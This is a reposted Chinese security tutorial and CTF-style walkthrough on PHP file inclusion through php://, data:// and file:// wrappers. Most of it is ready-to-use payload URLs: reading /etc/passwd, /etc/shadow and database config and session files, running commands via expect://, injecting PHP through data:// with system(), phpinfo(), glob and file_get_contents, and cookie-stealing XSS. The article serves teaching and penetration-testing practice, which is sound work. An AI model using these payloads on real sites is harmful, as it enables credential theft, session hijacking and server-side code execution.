文件包含之php、data、file伪协议

admin
admin
admin
138876
文章
114
评论
2024年5月29日00:17:16评论88 views字数 3985阅读13分17秒阅读模式

前言

本文为玲珑安全原创,未经授权不可转载。请进行合法的渗透测试,玲珑安全公众号、芳华绝代安全团队公众号及文章作者不承担任何因利用本文分享的内容而造成的任何后果。

文章目录

1、知识点
1.1、PHP_include
1.2、PHP伪协议
1.3、data伪协议
1.4、file伪协议
2、姿势
2.1、读取目录路径
2.2、读取目录文件
2.3、glob读取目录文件实例
2.4、读取文件内容
2.5、readfile读取文件内容实例

1、知识点

1.1、PHP_include

PHP_include 是 PHP 语言中一个重要的文件包含机制,可以将一个 PHP 文件包含到另一个 PHP 脚本文件中。该机制通常用于代码复用和模块化开发,在不同的 PHP 文件之间实现函数和类等代码的共享。
在 PHP 中,有两种文件包含机制:include 和 require。它们都可以将指定的 PHP 文件包含到当前脚本中,但两者在出错处理和返回值方面稍有不同。
- include:如果包含文件不存在或者出现错误,PHP 会发出警告并继续执行脚本。
- require:如果包含文件不存在或者出现错误,PHP 会立即停止脚本执行,并抛出致命错误。
此外,还有两个特殊的文件包含机制 include_once 和 require_once。它们可以确保包含文件只被包含一次,避免重复包含和执行。

1.2、PHP伪协议

PHP 伪协议是一种特殊的 URI 协议,可以绕过通常的协议限制,直接访问本地文件和执行 PHP 代码。
Payload如下
1. 读取 /etc/passwd 文件,显示系统用户列表

http://example.com/index.php?page=/etc/passwd

2. 读取 /etc/shadow 文件,尝试破解系统用户密码

http://example.com/index.php?page=/etc/shadow

3. 读取当前目录下的敏感文件

http://example.com/index.php?page=../../../etc/passwd

4. 读取 MySQL 配置文件,获取数据库连接信息

http://example.com/index.php?page=/var/www/config.php

5. 读取 PHP Session 文件,窃取用户会话信息

http://example.com/index.php?page=/var/lib/php/sessions/sess_SESSION_ID

6. 利用 expect 协议执行任意命令

http://example.com/index.php?page=expect://id

7. 利用 data 协议读取 base64 编码的文件内容

http://example.com/index.php?page=data:text/plain;base64,PD9waHAgc2V0X3RpbWUoJ2hvc3QnKTsgPz4=

1.3、data伪协议

data 伪协议是一种用于内嵌数据的伪协议,它可以将数据直接嵌入到 URI 中。这种伪协议通常用于将小型的图片、音频、视频等数据内嵌到网页中,从而减少 HTTP 请求的数量,并提高页面加载速度。
data URI 的语法如下:

data:[<mediatype>][;base64],<data>

其中,mediatype 是媒体类型,例如 text/plain、image/jpeg、audio/mpeg 等;如果数据需要进行 base64 编码,则在 media type 后添加 ;base64 标记;data 是实际的数据内容。

Payload:
1、Cookie弹窗

?page=data://text/plain,<script>alert(document.cookie)</script>

2、ping本地回环地址

?page=data://text/plain,<?php system("ping 127.0.0.1");?>

3、Base64编码绕过

?page=data://text/plain;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=

文件包含之php、data、file伪协议
4、查看PHP info

?page=data://text/plain,<?php echo phpinfo();?>

5、模板

?page=data://text/plain,payload

1.4、file伪协议

file 伪协议用于访问本地文件系统中的文件,可以在 web 页面中链接到本地文件,或者读取本地文件中的数据。

file URI 的语法如下:

file://<host>/<path>

其中,host 表示主机名或 IP 地址(可省略),path 表示文件路径(必须以 / 开头)。

Payload

file:///C:/Users/Desktop/index.html
file:///C:/Users/hacker/attack.php?parameter=<script>alert('玲珑安全')</script>

2、姿势

存在一场景如下:

文件包含之php、data、file伪协议

代码使用 $_GET['page'] 获取 URL 参数中名为 "page" 的值,并进行字符串替换,将 php:// 替换为空字符串
由于没有对 $page 变量进行足够的过滤,因此可使用文件包含读取flag

?page=data://text/plain,<?php echo phpinfo();?>

文件包含之php、data、file伪协议

由上图可知,data伪协议利用成功。

2.1、读取目录路径

Payload:
1、 $_SERVER['DOCUMENT_ROOT']; 会返回当前运行 PHP 脚本所在的文档根目录(Document Root)的绝对路径。

2、使用 $_SERVER['CONTEXT_DOCUMENT_ROOT'] 变量,它返回当前运行 PHP 脚本所在上下文的文档根目录的绝对路径。

3、使用 dirname(__FILE__) 函数,该函数返回当前执行的 PHP 脚本所在位置的绝对路径。

4、使用 getcwd() 函数,该函数返回当前工作目录的绝对路径。此方法适用于在 PHP 执行期间更改当前工作目录的情况。

要注意,在 PHP 7.0 及以后版本中,不再推荐使用 __FILE__ 常量,而是建议使用 __DIR__ 常量来代替 dirname(__FILE__) 函数。

如果网站根目录是 /var/www/html,则可以使用以下任意一种方式来获取网站根目录路径:

// 方法1$rootPath = $_SERVER['DOCUMENT_ROOT'];



// 方法2$rootPath = dirname(__FILE__);



// 方法3$rootPath = getcwd();



// 方法4$rootPath = $_SERVER['CONTEXT_DOCUMENT_ROOT'];

举个例子:

?page=data://text/plain,<?php echo dirname(__FILE__);?>

文件包含之php、data、file伪协议

返回了当前执行的 PHP 脚本所在位置的绝对路径text
再举个例子:

?page=data://text/plain,<?php echo $_SERVER['DOCUMENT_ROOT']; ?>

文件包含之php、data、file伪协议

返回了当前运行 PHP 脚本所在的文档根目录的绝对路径/var/www

2.2、读取目录文件

PHP 中一些获取目录下文件和子目录的函数:

1、scandir('指定目录') 函数将返回指定目录中的所有文件和子目录的数组列表。

2、glob($pattern, $flags):根据指定模式匹配获取与之匹配的文件或目录列表。$pattern 参数是一个通配符模式,支持 * 和 ? 等通配符,例如 *.txt 匹配所有以 .txt 结尾的文件。如果要获取文件和目录,可以使用 * 作为通配符。$flags 参数是一个可选参数,用于设置匹配模式和排序规则等。

3、scanglob($directory, $pattern):类似于 glob 函数,但是可以在指定的目录下递归搜索匹配指定模式的文件或目录。$directory 参数是要搜索的目录,$pattern 参数是要匹配的通配符模式。

2.3、glob读取目录文件实例

举个例子,打印输出目录 /var/www 下所有以 .php 结尾的文件列表:

?page=data://text/plain,<?php foreach (glob("/var/www/*.php") as $file){echo basename($file) . "n";}?>

回显如下:

文件包含之php、data、file伪协议

2.4、读取文件内容

file_get_contents($filename) 是 PHP 中一个常用的文件操作函数,它可以返回指定文件的内容。

Payload:

?page=data://text/plain,<?php $a=file_get_contents('fl4gisisish3r3.php'); echo $a; ?>

该Payload正确,但无回显。

猜测fl4gisisish3r3.php中字符串为HTML标签,从而被当作HTML元素来解析和显示

Payload:

?page=data://text/plain,<?php  $a=file_get_contents('fl4gisisish3r3.php'); echo htmlspecialchars($a); ?>

文件包含之php、data、file伪协议

如上图,猜测正确。

同时,readfile函数也可进行文件内容读取。

2.5、readfile读取文件内容实例

如果想使用 readfile 函数读取文件并输出到浏览器,但又希望避免浏览器解析 HTML 元素,可以使用 PHP 的 header() 函数来设置响应头,将输出内容的类型设置为纯文本格式。

?page=data://text/plain,<?php header("Content-Type: text/plain");readfile("fl4gisisish3r3.php");?>

文件包含之php、data、file伪协议

原文始发于微信公众号(芳华绝代安全团队):文件包含之php、data、file伪协议

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月29日00:17:16
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   文件包含之php、data、file伪协议https://cn-sec.com/archives/2790082.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息